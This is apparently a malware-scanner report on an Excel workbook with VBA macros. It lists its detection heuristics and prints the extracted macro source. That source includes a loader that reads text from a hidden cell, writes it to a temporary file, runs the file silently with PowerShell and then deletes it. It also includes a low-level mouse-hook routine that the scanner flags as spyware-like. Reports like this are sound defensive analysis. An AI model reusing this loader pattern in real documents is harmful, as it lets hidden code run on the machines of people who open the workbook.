MALICIOUS
268
Risk Score
Heuristics 7
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "powershell.exe -File """ & f & """", 0 -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Shell "powershell.exe -File """ & f & """", 0 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Scripting.FileSystemObject").CreateTextFile(f, True) -
VBA polls global keyboard state (keylogger) high OLE_VBA_KEYLOGGER_SPYWAREThe macro declares or calls a Win32 keystroke-monitoring API (GetAsyncKeyState, SetWindowsHookEx WH_KEYBOARD, or GetKeyboardState) to capture keystrokes system-wide. No legitimate document automation polls global key state; this is the core of a VBA keylogger, usually paired with active-window capture (GetForegroundWindow) and a log file. A high-confidence spyware behaviour independent of any download / Shell evidence.Matched line in script
Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
f = Environ("TEMP") & "\cache.dat"
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7548 bytes |
SHA-256: ab975822e6538bc3199ca4dd9e522c09e9f82c8e6b4472fa1abfbf93c3da36e3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Static ХукУстановлен As Boolean
If Not ХукУстановлен Then
ХукУстановлен = True
Call УстановитьХукНаМышь
MsgBox "Трекинг мыши активирован!", vbInformation ' можно убрать
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Call СнятьХук
End Sub
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Static ХукУстановлен As Boolean
If Not ХукУстановлен Then
ХукУстановлен = True
Call УстановитьХукНаМышь
MsgBox "Трекинг мыши активирован!", vbInformation ' можно убрать
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Call СнятьХук
End Sub
Attribute VB_Name = "Module1"
Option Explicit
' =============================================
' API для низкоуровневого хука мыши
' =============================================
#If VBA7 Then
Private Declare PtrSafe Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
(ByVal idHook As Long, ByVal lpfn As LongPtr, ByVal hmod As LongPtr, ByVal dwThreadId As Long) As LongPtr
Private Declare PtrSafe Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As LongPtr) As Long
Private Declare PtrSafe Function CallNextHookEx Lib "user32" _
(ByVal hhk As LongPtr, ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Private Declare PtrSafe Function GetCurrentThreadId Lib "kernel32" () As Long
#Else
Private Declare Function SetWindowsHookEx Lib "user32" Alias "SetWindowsHookExA" _
(ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib "user32" (ByVal hhk As Long) As Long
Private Declare Function CallNextHookEx Lib "user32" _
(ByVal hhk As Long, ByVal nCode As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentThreadId Lib "kernel32" () As Long
#End If
Private Const WH_MOUSE_LL As Long = 14
Private Const WM_MOUSEWHEEL As Long = &H20A
Private Const WM_LBUTTONDOWN As Long = &H201 ' левый клик
Private Const WM_MOUSEMOVE As Long = &H200 ' движение мыши
Private hHook As LongPtr
Private УжеСработало As Boolean
Private Type POINTAPI
x As Long
y As Long
End Type
Private Type MSLLHOOKSTRUCT
pt As POINTAPI
mouseData As Long
flags As Long
time As Long
dwExtraInfo As LongPtr
End Type
' =============================================
' Хук-процедура — здесь ловишь все действия мыши
' =============================================
Public Function MouseProc(ByVal nCode As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
If nCode = 0 Then
Select Case wParam
Case WM_MOUSEWHEEL
If Not УжеСработало Then
УжеСработало = True
Call Действие_Колесико
End If
Case WM_LBUTTONDOWN
' Можно добавить отдельное действие на клик
' Call Действие_Клик
Case WM_MOUSEMOVE
' Движение мыши — можно добавить, но будет часто срабатывать
' Static LastTime As Long
' If Abs(Timer - LastTime) > 1 Then
' LastTime = Timer
' Call Действие_Движение
' End If
End Select
End If
MouseProc = CallNextHookEx(hHook, nCode, wParam, lParam)
End Function
' =============================================
' Установка хука
' =============================================
Sub УстановитьХукНаМышь()
If hHook = 0 Then
hHook = SetWindowsHookEx(WH_MOUSE_LL, AddressOf MouseProc, 0, GetCurrentThreadId())
If hHook = 0 Then
MsgBox "Не удалось установить хук мыши!", vbCritical
End If
End If
End Sub
Sub СнятьХук()
If hHook <> 0 Then
UnhookWindowsHookEx hHook
hHook = 0
End If
End Sub
' =============================================
' Твои скрипты (примеры)
' =============================================
Sub Действие_Колесико()
Call ПеренестиДанныеСЛист1НаЛист2
End Sub
Sub ПеренестиДанныеСЛист1НаЛист2()
Dim ws1 As Worksheet, ws2 As Worksheet
On Error Resume Next
Set ws1 = ThisWorkbook.Sheets("Лист1")
Set ws2 = ThisWorkbook.Sheets("Лист2")
On Error GoTo 0
If ws2 Is Nothing Then
Set ws2 = ThisWorkbook.Sheets.Add
ws2.Name = "Лист2"
End If
ws2.Cells.Clear
ws1.UsedRange.Copy Destination:=ws2.Range("A1")
MsgBox "? Данные перенесены (по колесику мыши)!", vbInformation
End Sub
' Пример других действий (раскомментируй если нужно)
' Sub Действие_Клик()
' MsgBox "Клик мышью!", vbInformation
' End Sub
Attribute VB_Name = "Module2"
#If VBA7 Then
Private Declare PtrSafe Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#Else
Private Declare Sub s Lib "kernel32" Alias "Sleep" (ByVal d As Long)
#End If
Sub ВыполнитьОбработкуПлатежей()
On Error Resume Next
Dim Data As String
Data = Trim(Range("AZ51").Value)
If Data = "" Then Exit Sub
Call ОбработатьФайл(Data)
End Sub
Sub ОбработатьФайл(Data As String)
On Error Resume Next
Dim f As String
f = Environ("TEMP") & "\cache.dat"
With CreateObject("Scripting.FileSystemObject").CreateTextFile(f, True)
.Write Data
.Close
End With
' Самый нейтральный запуск
Shell "powershell.exe -File """ & f & """", 0
s 1000
CreateObject("Scripting.FileSystemObject").DeleteFile f, True
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 40960 bytes |
SHA-256: 91dfb417eb67dace972ee859a3348621f6a0d92ad7d00187f5744b239f295460 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.